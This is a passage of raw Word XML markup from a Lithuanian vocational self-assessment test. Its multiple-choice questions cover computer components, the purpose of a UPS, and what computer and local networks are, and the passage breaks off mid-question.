        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900D76A" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Procesorių ir operatyvinę atmintį;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054CFB4" w14:textId="65EEC912" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Maitinimo blok</w:t>
      </w:r>
      <w:r w:rsidR="0E1D1A04" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir operatyvin</w:t>
      </w:r>
      <w:r w:rsidR="2777372C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> atmint</w:t>
      </w:r>
      <w:r w:rsidR="6A5E353B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B11033" w14:textId="7D261B51" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Maitinimo blok</w:t>
      </w:r>
      <w:r w:rsidR="0DA0AD0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, operatyvin</w:t>
      </w:r>
      <w:r w:rsidR="1B7BEE39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> atmint</w:t>
      </w:r>
      <w:r w:rsidR="384802FC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, kiet</w:t>
      </w:r>
      <w:r w:rsidR="433B717A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ąjį</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> disk</w:t>
      </w:r>
      <w:r w:rsidR="5C06B6F1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, aušinimo sistem</w:t>
      </w:r>
      <w:r w:rsidR="72E138D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C725E8" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F77FB5" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12D336" w14:textId="35DBDF7E" w:rsidR="006D6864" w:rsidRPr="005A5C28" w:rsidRDefault="006D6864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Įvadas į darbo rinką“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D8280" w14:textId="3B1422B4" w:rsidR="006D6864" w:rsidRPr="005A5C28" w:rsidRDefault="006D6864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C178CD4" w14:textId="77777777" w:rsidR="00AF1A50" w:rsidRPr="005A5C28" w:rsidRDefault="00AF1A50" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>TESTAS ĮSIVERTINTI GEBĖJIMAMS BAIGUS PROGRAMĄ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C736FDA" w14:textId="3B1422B4" w:rsidR="006D6864" w:rsidRPr="005A5C28" w:rsidRDefault="006D6864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021A9E77" w14:textId="41D04B8F" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pabaik</w:t>
      </w:r>
      <w:r w:rsidR="00BA57B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> teiginį:</w:t>
      </w:r>
      <w:r w:rsidR="00827E65" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Nepertraukiamo maitinimo šaltinio (UPS) įrenginys skirtas tam</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kad</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DE9E9" w14:textId="40C12EBE" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) jo sudėtyje esan</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>tis</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">el. įkrovos akumuliatorius </w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>suteiktų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pakankamai laiko saugiai išjungti kompiuterį pradingus elektrai</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C436FB5" w14:textId="6D9BE377" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) apsaugot</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterį nuo staigių įtampos el. maitinimo tinkle pokyčių</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322137FD" w14:textId="1D2FDFD8" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) abu atsakymai teisingi</w:t>
      </w:r>
      <w:r w:rsidR="00D83813" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78F53A" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6DB875" w14:textId="481CD4FC" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2. Kas yra kompiuterių tinklas?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4A2848" w14:textId="3B0AED68"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai kompiuteriai, kurie siunčia duomenis į tinklo mazgą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF852D0" w14:textId="2D428819"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b) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai tarpusavyje sujungti kompiuteriai, galintys keistis informacija</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DA464" w14:textId="5EE54798"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Tai v</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>isi kompiuterio įrenginiai, magistralėmis sujungti į visumą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C62471" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE87E53" w14:textId="628A28C4" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>3. K</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą vadiname</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vietini</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkl</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41430281" w14:textId="032A6D90"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai organizacijos tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3EC39" w14:textId="3746B0A8"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b) </w:t>
